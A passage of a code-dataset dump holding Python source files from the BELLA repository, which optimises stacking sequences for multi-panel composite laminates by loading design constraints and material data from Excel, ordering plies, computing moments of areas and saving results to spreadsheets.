int(data_constraints[\"dam_tol_rule\"].iloc[0])\r\ncovering = data_constraints[\"covering\"].iloc[0]\r\nn_covering = int(data_constraints[\"n_covering\"].iloc[0])\r\nrule_10_percent = data_constraints[\"10% rule\"].iloc[0]\r\nrule_10_Abdalla = data_constraints[\"10% rule applied on LPs\"].iloc[0]\r\npercent_Abdalla = float(data_constraints[\r\n \"percentage limit when rule applied on LPs\"].iloc[0])\r\npercent_0 = float(data_constraints[\"percent_0\"].iloc[0])\r\npercent_45 = float(data_constraints[\"percent_45\"].iloc[0])\r\npercent_90 = float(data_constraints[\"percent_90\"].iloc[0])\r\npercent_135 = float(data_constraints[\"percent_-45\"].iloc[0])\r\npercent_45_135 = float(data_constraints[\"percent_+-45\"].iloc[0])\r\ndiso = data_constraints[\"diso\"].iloc[0]\r\ndelta_angle = float(data_constraints[\"delta_angle\"].iloc[0])\r\ncontig = data_constraints[\"contig\"].iloc[0]\r\nn_contig = int(data_constraints[\"n_contig\"].iloc[0])\r\nset_of_angles = np.array(\r\n data_constraints[\"fibre orientations\"].iloc[0].split(\" \"), int)\r\npdl_spacing = data_constraints[\"ply drop spacing rule\"].iloc[0]\r\nmin_drop = int(data_constraints[\r\n \"minimum number of 
continuous plies between ply drops\"].iloc[0])\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\ndata_materials = pd.read_excel(filename_input, sheet_name='Materials',\r\n header=None, index_col=0).T\r\nE11 = data_materials[\"E11\"].iloc[0]\r\nE22 = data_materials[\"E22\"].iloc[0]\r\nnu12 = data_materials[\"nu12\"].iloc[0]\r\nG12 = data_materials[\"G12\"].iloc[0]\r\ndensity_area = data_materials[\"areal density\"].iloc[0]\r\nply_t = data_materials[\"ply thickness\"].iloc[0]\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\ndata_objective = pd.read_excel(filename_input, sheet_name='Objective function',\r\n header=None, index_col=0).T\r\ncoeff_10 = data_objective[\"coeff_10\"].iloc[0]\r\ncoeff_contig = data_objective[\"coeff_contig\"].iloc[0]\r\ncoeff_diso = data_objective[\"coeff_diso\"].iloc[0]\r\ncoeff_oopo = data_objective[\"coeff_oopo\"].iloc[0]\r\ncoeff_spacing = data_objective[\"coeff_spacing\"].iloc[0]\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\ndata_panels = pd.read_excel(filename_input, sheet_name='Panels')\r\n\r\nlampam_weightings_all = data_panels[[\r\n \"lampam_weightings[1]\", \"lampam_weightings[2]\", \"lampam_weightings[3]\",\r\n \"lampam_weightings[4]\", \"lampam_weightings[5]\", \"lampam_weightings[6]\",\r\n \"lampam_weightings[7]\", \"lampam_weightings[8]\", \"lampam_weightings[9]\",\r\n \"lampam_weightings[10]\", \"lampam_weightings[11]\", \"lampam_weightings[12]\"]]\r\n\r\nlampam_targets_all = data_panels[[\r\n \"lampam_target[1]\", \"lampam_target[2]\", \"lampam_target[3]\",\r\n \"lampam_target[4]\", \"lampam_target[5]\", \"lampam_target[6]\",\r\n \"lampam_target[7]\", \"lampam_target[8]\", \"lampam_target[9]\",\r\n \"lampam_target[10]\", \"lampam_target[11]\", \"lampam_target[12]\"]]\r\n\r\npanels = []\r\nfor ind_panel in range(data_panels.shape[0]):\r\n panels.append(Panel(\r\n ID=int(data_panels[\"Panel ID\"].iloc[ind_panel]),\r\n lampam_target=np.array(lampam_targets_all.iloc[ind_panel], float),\r\n lampam_weightings=np.array(lampam_weightings_all.iloc[ind_panel], float),\r\n n_plies=int(data_panels[\"Number of plies\"].iloc[ind_panel]),\r\n weighting=float(data_panels[\r\n \"Weighting in MP objective funtion\"].iloc[ind_panel]),\r\n neighbour_panels=np.array(data_panels[\r\n \"Neighbour panel IDs\"].iloc[ind_panel].split(\" \"), int),\r\n constraints=constraints,\r\n length_x=float(data_panels[\"Length_x\"].iloc[ind_panel]),\r\n length_y=float(data_panels[\"Length_y\"].iloc[ind_panel]),\r\n 
N_x=float(data_panels[\"N_x\"].iloc[ind_panel]),\r\n N_y=float(data_panels[\"N_y\"].iloc[ind_panel])))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Organise the data structures of the results of FXI ------------------------\r\n\r\n\r\nsst_all = pd.read_excel(filename_FXI, sheet_name='Best result FXI').fillna(-1)\r\nsst_all = np.array(sst_all, int).T\r\n\r\ndic_n_plies_sst = {}\r\nfor line in sst_all:\r\n n_plies = line[line != -1].size\r\n dic_n_plies_sst[n_plies] = line\r\n\r\nsst = []\r\n\r\nfor panel in multipanel.panels:\r\n sst.append(dic_n_plies_sst[panel.n_plies])\r\nsst = np.array(sst)\r\n\r\n# remove unecessary -1\r\nfor ind in range(sst.shape[1])[::-1]:\r\n if (sst[:, ind] == -1).all():\r\n sst = np.delete(sst, np.s_[ind], axis=1)\r\n\r\nss = convert_sst_to_ss(sst)\r\n\r\n# lamination parameters\r\nlampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n\r\n# disorientaion - penalty used in blending steps 4.2 and 4.3\r\nn_diso = calc_number_violations_diso_mp(ss, constraints)\r\nif constraints.diso and n_diso.any():\r\n penalty_diso = n_diso\r\nelse:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n# contiguity - penalty used in blending steps 4.2 and 4.3\r\nn_contig = calc_penalty_contig_mp(ss, constraints)\r\nif constraints.contig and n_contig.any():\r\n penalty_contig = n_contig\r\nelse:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n# 10% rule - no penalty used in blending steps 4.2 and 4.3\r\nif constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\nelse:\r\n penalty_10 = calc_penalty_10_pc(\r\n calc_ply_counts(multipanel, ss, constraints), constraints)\r\n\r\n# balance\r\npenalty_bal_ipo = calc_penalty_ipo(lampam)\r\n\r\n# out-of-plane orthotropy\r\npenalty_oopo = calc_penalty_oopo_ss(lampam, constraints=constraints)\r\n\r\n# penalty_spacing\r\npenalty_spacing = calc_penalty_spacing(\r\n pdl=sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n\r\nresults = BELLA_Results(constraints, multipanel)\r\nresults_one_pdl = BELLA_ResultsOnePdl()\r\n\r\nresults_one_pdl.ss = ss\r\nresults_one_pdl.lampam = lampam\r\nresults_one_pdl.penalty_diso = penalty_diso\r\nresults_one_pdl.penalty_contig = penalty_contig\r\nresults_one_pdl.penalty_10 = penalty_10\r\nresults_one_pdl.penalty_bal_ipo = penalty_bal_ipo\r\nresults_one_pdl.penalty_oopo = penalty_oopo\r\nresults_one_pdl.penalty_spacing = penalty_spacing\r\nresults_one_pdl.n_diso = n_diso\r\nresults_one_pdl.n_contig = n_contig\r\nresults_one_pdl.sst = sst\r\n\r\nresults.update(0, results_one_pdl)\r\nresults.lampam = lampam\r\nresults.sst = sst\r\nresults.ss = ss\r\n\r\n### Save data -----------------------------------------------------------------\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_materials(filename_res, materials)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_multipanel(filename_res, multipanel, obj_func_param, materials)\r\nsave_result_BELLAs(filename_res, multipanel, constraints, None,\r\n obj_func_param, None, results, materials, only_best=True)\r\nautofit_column_widths(filename_res)"
},
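The script above stores one stacking sequence per row of a table padded with -1 where a panel has fewer plies, then strips the columns that are padding everywhere. Here is a self-contained sketch of that trimming step on a toy two-panel table; convert_sst_to_ss, which turns the trimmed table into per-panel sequences, is part of the BELLA sources and is not reproduced here.

# Standalone sketch of the padding clean-up above: drop trailing columns of a
# stacking sequence table (sst) in which every panel holds the padding value -1.
import numpy as np

sst = np.array([[0, 45, -45, 90, -1, -1],
                [0, 45, -45, 90, 90, -1]])

# delete columns that contain only padding, scanning from the right
for ind in range(sst.shape[1])[::-1]:
    if (sst[:, ind] == -1).all():
        sst = np.delete(sst, np.s_[ind], axis=1)

print(sst)   # the all-padding last column is removed; partial columns remain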
{
"alpha_fraction": 0.5623431205749512,
"alphanum_fraction": 0.5740585923194885,
"avg_line_length": 27.875,
"blob_id": "0f434c6aef3cad3aa97915b6f037b3dc182e1c77",
"content_id": "a4d545cdffbe647672889f22f18c083c0ba11fba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1195,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 40,
"path": "/src/BELLA/ply_order.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate the order in which plies are optimised\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef calc_ply_order(multipanel, constraints):\r\n \"\"\"\r\n calulates the order in which plies are optimised\r\n\r\n OUTPUTS\r\n\r\n - ply_order[ind_panel]: array of the ply indices sorted in the order in\r\n which plies are optimised (middle ply of symmetric laminates included)\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n \"\"\"\r\n ply_order = []\r\n\r\n for panel in multipanel.reduced.panels:\r\n if constraints.sym:\r\n ply_order.append(\r\n np.arange(panel.n_plies // 2 + panel.n_plies % 2))\r\n else:\r\n order_before_sorting = np.arange(panel.n_plies)\r\n ply_order_new = np.zeros((panel.n_plies,), int)\r\n ply_order_new[0::2] = order_before_sorting[\r\n :panel.n_plies // 2 + panel.n_plies % 2]\r\n ply_order_new[1::2] = order_before_sorting[\r\n panel.n_plies // 2 + panel.n_plies % 2:][::-1]\r\n ply_order.append(ply_order_new)\r\n\r\n return ply_order\r\n"
},
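For asymmetric laminates, calc_ply_order above interleaves ply indices so that plies are visited from the two surfaces towards the core. A self-contained illustration of that interleaving for a single 7-ply panel (no BELLA classes required):

# Illustration of the interleaving in calc_ply_order for an asymmetric
# laminate: plies are visited from both surfaces towards the core.
import numpy as np

n_plies = 7
order_before_sorting = np.arange(n_plies)
ply_order = np.zeros((n_plies,), int)
ply_order[0::2] = order_before_sorting[:n_plies // 2 + n_plies % 2]
ply_order[1::2] = order_before_sorting[n_plies // 2 + n_plies % 2:][::-1]
print(ply_order)   # [0 6 1 5 2 4 3]: outermost plies first, middle ply last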
{
"alpha_fraction": 0.6048428416252136,
"alphanum_fraction": 0.6241703629493713,
"avg_line_length": 39.180179595947266,
"blob_id": "89c6afa0320968989cd08521c35bc1f4f0756bfe",
"content_id": "ffcff803eaf951d110a46fbe024138cc19df2810",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13711,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 333,
"path": "/src/BELLA/save_set_up.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to save laminate design set-up\r\n\r\n- save_objective_function_BELLA:\r\n saves the objective function parameters on Sheet [Objective function]\r\n\r\n- save_multipanel:\r\n saves the data of the multipanel structure:\r\n - panel geometry\r\n - panel thickness targets\r\n - panel lamination parameter targets\r\n - lamination parameter first-level sensitivities\r\n - boundaries accross panels\r\n\r\n- save_constraints_BELLA\r\n save the design and manufacturing constraints on Sheet [Constraints]\r\n\r\n- save_parameters_BELLA\r\n saves the optimiser parameters on Sheet [Parameters]\r\n\r\n- save_materials\r\n saves the material properties on Sheet [Materials]\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_mp\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\ndef save_materials(filename, materials):\r\n \"\"\"\r\n saves the material properties on Sheet [Materials]\r\n \"\"\"\r\n table_mat = pd.DataFrame()\r\n table_mat.loc[0, 'E11'] = materials.E11\r\n table_mat.loc[0, 'E22'] = materials.E22\r\n table_mat.loc[0, 'G12'] = materials.G12\r\n table_mat.loc[0, 'nu12'] = materials.nu12\r\n table_mat.loc[0, 'nu21'] = materials.nu21\r\n table_mat.loc[0, 'areal density'] = materials.density_area\r\n table_mat.loc[0, 'volumic density'] = materials.density_volume\r\n table_mat.loc[0, 'ply thickness'] = materials.ply_t\r\n\r\n table_mat.loc[0, 'Q11'] = materials.Q11\r\n table_mat.loc[0, 'Q12'] = materials.Q12\r\n table_mat.loc[0, 'Q22'] = materials.Q22\r\n table_mat.loc[0, 'Q66'] = materials.Q66\r\n\r\n table_mat.loc[0, 'U1'] = materials.U1\r\n table_mat.loc[0, 'U2'] = materials.U2\r\n table_mat.loc[0, 'U3'] = materials.U3\r\n table_mat.loc[0, 'U4'] = materials.U4\r\n table_mat.loc[0, 'U5'] = materials.U5\r\n\r\n table_mat = table_mat.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_mat, 'Materials', index=True, header=False)\r\n\r\n\r\ndef save_multipanel(\r\n filename, multipanel, obj_func_param, sst=None,\r\n calc_penalties=False, constraints=None, mat=None, save_buckling=False):\r\n \"\"\"\r\n saves the data of the multipanel structure:\r\n - panel geometry\r\n - panel thickness targets\r\n - panel lamination-parameter targets\r\n - lamination parameter first-level sensitivities\r\n - boundaries accross panels\r\n - constraints: design guidelines\r\n - sst: stacking sequence table\r\n \"\"\"\r\n table_mp = pd.DataFrame()\r\n table_mp.loc[0, 'Number of panels'] = multipanel.n_panels\r\n table_mp.loc[0, 'Number of plies max'] = multipanel.n_plies_max\r\n table_mp.loc[0, 'Area'] = multipanel.area_patches\r\n table_mp.loc[0, 'Area of all patches'] = multipanel.area_patches\r\n if mat is not None:\r\n table_mp.loc[0, 'Weight'] = multipanel.calc_weight(mat.density_area)\r\n table_mp.loc[0, 'Index of one thickest panel'] = multipanel.ind_thick\r\n table_mp.loc[0, 'Number of plies max'] = multipanel.n_plies_max\r\n\r\n if calc_penalties:\r\n # penalty_spacing\r\n penalty_spacing = 
calc_penalty_spacing(\r\n pdl=sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n table_mp.loc[0, 'Penalty spacing'] = penalty_spacing\r\n\r\n table_mp = table_mp.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_mp, 'Multipanel', index=True, header=False)\r\n\r\n table_p = pd.DataFrame()\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n\r\n table_p.loc[ind_p, 'Panel ID'] = panel.ID\r\n table_p.loc[ind_p, 'Neighbour panel IDs'] \\\r\n = \" \".join(np.array(panel.neighbour_panels).astype(str))\r\n table_p.loc[ind_p, 'Number of plies'] = panel.n_plies\r\n\r\n table_p.loc[ind_p, 'Weighting in MP objective funtion'] = panel.weighting\r\n\r\n if panel.length_x and panel.length_y:\r\n table_p.loc[ind_p, 'Length_x'] = panel.length_x\r\n table_p.loc[ind_p, 'Length_y'] = panel.length_y\r\n table_p.loc[ind_p, 'Area'] = panel.area\r\n else:\r\n table_p.loc[ind_p, 'Area'] = panel.area\r\n\r\n if hasattr(panel, 'N_x'):\r\n table_p.loc[ind_p, 'N_x'] = panel.N_x\r\n table_p.loc[ind_p, 'N_y'] = panel.N_y\r\n\r\n if hasattr(panel, 'Weight'):\r\n table_p.loc[ind_p, 'Weight'] = panel.calc_weight(mat.density_area)\r\n\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_target[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_target[ind]\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_weightings_ini[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_weightings_ini[ind]\r\n for ind in range(12):\r\n table_p.loc[ind_p, 'lampam_weightings[' + str(ind + 1) + ']'] \\\r\n = panel.lampam_weightings[ind]\r\n\r\n if calc_penalties:\r\n ss = np.array(convert_sst_to_ss(sst))\r\n\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.panels])\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n lampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, LPs=None)\r\n\r\n penalty_ipo, penalty_oopo = calc_penalty_ipo_oopo_mp(\r\n lampam, constraints)\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n table_p.loc[ind_p, 'Penalty disorientation'] = penalty_diso[ind_p]\r\n table_p.loc[ind_p, 'Penalty contiguity'] = penalty_contig[ind_p]\r\n table_p.loc[ind_p, 'Penalty disorientation'] = penalty_diso[ind_p]\r\n table_p.loc[ind_p, 'Penalty contiguity'] = penalty_contig[ind_p]\r\n table_p.loc[ind_p, 'Penalty 10% rule'] = penalty_10[ind_p]\r\n table_p.loc[ind_p, 'Penalty balance'] = penalty_ipo[ind_p]\r\n table_p.loc[ind_p, 'Penalty out-of-plane orthotropy'] \\\r\n = penalty_oopo[ind_p]\r\n\r\n if save_buckling:\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n table_p.loc[ind_p, 'lambda buckling'] = buckling_factor(\r\n lampam=panel.lampam_target,\r\n mat=mat,\r\n n_plies=panel.n_plies,\r\n N_x=panel.N_x,\r\n N_y=panel.N_y,\r\n length_x=panel.length_x,\r\n length_y=panel.length_y,\r\n n_modes=10)\r\n\r\n append_df_to_excel(\r\n filename, table_p, 'Panels', index=True, header=True)\r\n return 0\r\n\r\ndef 
save_constraints_BELLA(filename, constraints):\r\n \"\"\"\r\n saves the design and manufacturing constraints on Sheet [Constraints]\r\n \"\"\"\r\n table_const = pd.DataFrame()\r\n table_const.loc[0, 'symmetry'] = constraints.sym\r\n table_const.loc[0, 'balance'] = constraints.bal\r\n table_const.loc[0, 'out-of-plane orthotropy'] = constraints.oopo\r\n table_const.loc[0, 'damage tolerance'] = constraints.dam_tol\r\n table_const.loc[0, 'dam_tol_rule'] = constraints.dam_tol_rule\r\n table_const.loc[0, 'covering'] = constraints.covering\r\n table_const.loc[0, 'n_covering'] = constraints.n_covering\r\n table_const.loc[0, '10% rule'] = constraints.rule_10_percent\r\n table_const.loc[0, '10% rule applied on LPs'] \\\r\n = constraints.rule_10_percent and constraints.rule_10_Abdalla\r\n table_const.loc[0, '10% rule applied on ply percentages'] \\\r\n = constraints.rule_10_percent and not constraints.rule_10_Abdalla\r\n if constraints.rule_10_percent:\r\n table_const.loc[0, 'percentage limit when rule applied on LPs'] \\\r\n = constraints.percent_Abdalla * 100\r\n table_const.loc[0, 'percent_0'] = constraints.percent_0 * 100\r\n table_const.loc[0, 'percent_45'] = constraints.percent_45 * 100\r\n table_const.loc[0, 'percent_90'] = constraints.percent_90 * 100\r\n table_const.loc[0, 'percent_-45'] = constraints.percent_135 * 100\r\n table_const.loc[0, 'percent_+-45'] = constraints.percent_45_135 * 100\r\n else:\r\n table_const.loc[0, 'percentage limit when rule applied on LPs'] = 0\r\n table_const.loc[0, 'percent_0'] = 0\r\n table_const.loc[0, 'percent_45'] = 0\r\n table_const.loc[0, 'percent_90'] = 0\r\n table_const.loc[0, 'percent_-45'] = 0\r\n table_const.loc[0, 'percent_+-45'] = 0\r\n table_const.loc[0, 'diso'] = constraints.diso\r\n table_const.loc[0, 'delta_angle'] = constraints.delta_angle\r\n table_const.loc[0, 'contig'] = constraints.contig\r\n table_const.loc[0, 'n_contig'] = constraints.n_contig_c\r\n sets = np.array(constraints.set_of_angles, dtype=str)\r\n table_const.loc[0, 'fibre orientations'] = ' '.join(sets)\r\n table_const.loc[0, 'number fibre orientations'] \\\r\n = constraints.n_set_of_angles\r\n # table_const.loc[0, 'n_plies_min'] = constraints.n_plies_min\r\n # table_const.loc[0, 'n_plies_max'] = constraints.n_plies_max\r\n table_const.loc[0, 'ply drop spacing rule'] \\\r\n = constraints.pdl_spacing\r\n table_const.loc[0, 'minimum number of continuous plies between ply drops']\\\r\n = constraints.min_drop\r\n\r\n table_const = table_const.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_const, 'Constraints', index=True, header=False)\r\n\r\ndef save_parameters_BELLA(filename, parameters):\r\n \"\"\"\r\n saves the optimiser parameters on Sheet [Parameters]\r\n \"\"\"\r\n table_param = pd.DataFrame()\r\n\r\n # Parameters of BELLA step 2\r\n table_param.loc[0, 'number of initial ply drops'] \\\r\n = parameters.n_ini_ply_drops\r\n table_param.loc[0, 'minimum group size'] = parameters.group_size_min\r\n table_param.loc[0, 'maximum group size'] = parameters.group_size_max\r\n table_param.loc[0, 'time_limit_group_pdl'] = parameters.time_limit_group_pdl\r\n table_param.loc[0, 'time_limit_all_pdls'] = parameters.time_limit_all_pdls\r\n table_param.loc[0, 'global_node_limit'] \\\r\n = parameters.global_node_limit\r\n table_param.loc[0, 'global_node_limit_final'] \\\r\n = parameters.global_node_limit_final\r\n table_param.loc[0, 'local_node_limit'] \\\r\n = parameters.local_node_limit\r\n table_param.loc[0, 'local_node_limit_final'] \\\r\n = 
parameters.local_node_limit_final\r\n\r\n # Parameters of BELLA step 4.1\r\n table_param.loc[0, 'input number of plies in reference panel'] \\\r\n = parameters.n_plies_ref_panel\r\n table_param.loc[0, 'repair_membrane_switch'] \\\r\n = parameters.repair_membrane_switch\r\n table_param.loc[0, 'repair_flexural_switch'] \\\r\n = parameters.repair_flexural_switch\r\n table_param.loc[0, 'p_A'] \\\r\n = parameters.p_A\r\n table_param.loc[0, 'n_D1'] \\\r\n = parameters.n_D1\r\n table_param.loc[0, 'n_D2'] \\\r\n = parameters.n_D2\r\n table_param.loc[0, 'n_D3'] \\\r\n = parameters.n_D3\r\n\r\n # Parameters of BELLA step 4.2\r\n table_param.loc[0, 'global_node_limit2'] \\\r\n = parameters.global_node_limit2\r\n table_param.loc[0, 'local_node_limit2'] \\\r\n = parameters.local_node_limit2\r\n\r\n # Parameters of BELLA step 4.3\r\n table_param.loc[0, 'global_node_limit3'] \\\r\n = parameters.global_node_limit3\r\n table_param.loc[0, 'local_node_limit3'] \\\r\n = parameters.local_node_limit3\r\n\r\n table_param = table_param.transpose()\r\n\r\n append_df_to_excel(\r\n filename, table_param, 'Parameters', index=True, header=False)\r\n\r\n\r\ndef save_objective_function_BELLA(filename, obj_func_param):\r\n \"\"\"\r\n saves the objective function parameters on Sheet [Objective function]\r\n \"\"\"\r\n table_obj_func = pd.DataFrame()\r\n\r\n # General parameters of BELLA\r\n table_obj_func.loc[0, 'optimisation problem'] = \"LP matching\"\r\n\r\n# for ind in range(12):\r\n# table_obj_func.loc[0, 'lampam_weightings[' + str(ind + 1) + ']'] \\\r\n# = obj_func_param.lampam_weightings[ind]\r\n#\r\n# for ind_p in range(obj_func_param.panel_weightings_ini.size):\r\n# table_obj_func.loc[0, 'panel_weightings_ini[' + str(ind_p + 1) + ']'] \\\r\n# = obj_func_param.panel_weightings_ini[ind_p]\r\n\r\n # Penalty coefficients\r\n table_obj_func.loc[0, 'coeff_contig'] = obj_func_param.coeff_contig\r\n table_obj_func.loc[0, 'coeff_diso'] = obj_func_param.coeff_diso\r\n table_obj_func.loc[0, 'coeff_10'] = obj_func_param.coeff_10\r\n table_obj_func.loc[0, 'coeff_bal_ipo'] = obj_func_param.coeff_bal_ipo\r\n table_obj_func.loc[0, 'coeff_oopo'] = obj_func_param.coeff_oopo\r\n table_obj_func.loc[0, 'coeff_spacing'] = obj_func_param.coeff_spacing\r\n\r\n table_obj_func = table_obj_func.transpose()\r\n\r\n append_df_to_excel(filename, table_obj_func, 'Objective function',\r\n index=True, header=False)"
},
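All of the save_* functions above follow one pattern: collect scalars into a one-row DataFrame, transpose it so each property becomes a row, and append it to a named worksheet. A minimal sketch of that layout with plain pandas; to_excel stands in for the repository's append_df_to_excel helper, and the file name and property values are placeholders:

# Sketch of the key/value sheet layout used by the save_* functions: one row
# of properties is transposed so each property becomes a row, then written to
# a named sheet.
import pandas as pd

table = pd.DataFrame()
table.loc[0, 'E11'] = 130e9
table.loc[0, 'E22'] = 9e9
table.loc[0, 'nu12'] = 0.3
table = table.transpose()   # properties down the rows, values in one column

with pd.ExcelWriter('materials_demo.xlsx') as writer:
    table.to_excel(writer, sheet_name='Materials', header=False)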
{
"alpha_fraction": 0.5396360754966736,
"alphanum_fraction": 0.5590880513191223,
"avg_line_length": 33.94736862182617,
"blob_id": "205e596d6618ffa0e74c1406161292639926ce60",
"content_id": "d1ae97f2325199c33f58676d2ccdb56a20de9c92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4781,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 133,
"path": "/src/LAYLA_V02/moment_of_areas.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate moments of areas\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\ndef calc_mom_of_areas(constraints, targets, ply_order, n_plies_in_groups):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - mom_areas[ply_index, 0]: signed area of ply of index 'ply_index'\r\n - mom_areas[ply_index, 1]: signed first moment of area of ply of index\r\n 'ply_index'\r\n - mom_areas[ply_index, 2]: signed second moment of area of ply of index\r\n 'ply_index'\r\n\r\n - cummul_mom_areas[:, 0/1/2]: cummulated areas/first/second moments of\r\n areas of the plies in the order in which plies are optimised\r\n\r\n - group_mom_areas[:, 0/1/2]: cummulated areas/first/second moments of\r\n areas of ply groups in the order in which plies are optimised\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n - n_plies_in_groups: number of plies in each group of plies\r\n \"\"\"\r\n group_mom_areas = np.zeros((n_plies_in_groups.size, 3), float)\r\n\r\n if constraints.sym:\r\n\r\n ply_indices = np.arange(targets.n_plies // 2 + targets.n_plies % 2)\r\n mom_areas = np.zeros((\r\n targets.n_plies // 2 + targets.n_plies % 2, 3), float)\r\n\r\n pos_bot = (2 / targets.n_plies) * ply_indices - 1\r\n pos_top = (2 / targets.n_plies) * (ply_indices + 1) - 1\r\n\r\n if targets.n_plies % 2:\r\n pos_top[-1] = 0\r\n\r\n mom_areas[:, 0] = pos_top - pos_bot\r\n mom_areas[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n n_plies_in_group = 0\r\n ind_ply_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n cummul_mom_areas = np.zeros((\r\n targets.n_plies // 2 + targets.n_plies % 2, 3), float)\r\n\r\n for ply_index in range(targets.n_plies // 2 + targets.n_plies % 2):\r\n\r\n cummul_mom_areas[ply_index:, :] += abs(mom_areas[ply_index, :])\r\n\r\n n_plies_in_group += 1\r\n mom_areas_ply_group += abs(mom_areas[ply_index, :])\r\n\r\n if n_plies_in_group == n_plies_in_groups[ind_ply_group]:\r\n group_mom_areas[ind_ply_group, :] = mom_areas_ply_group\r\n ind_ply_group += 1\r\n n_plies_in_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n else:\r\n mom_areas = np.zeros((targets.n_plies, 3), float)\r\n cummul_mom_areas = np.zeros((targets.n_plies, 3), float)\r\n\r\n ply_indices = np.arange(targets.n_plies)\r\n pos_bot = ((2 / targets.n_plies) * ply_indices - 1)[ply_order]\r\n pos_top = ((2 / targets.n_plies) * (ply_indices + 1) - 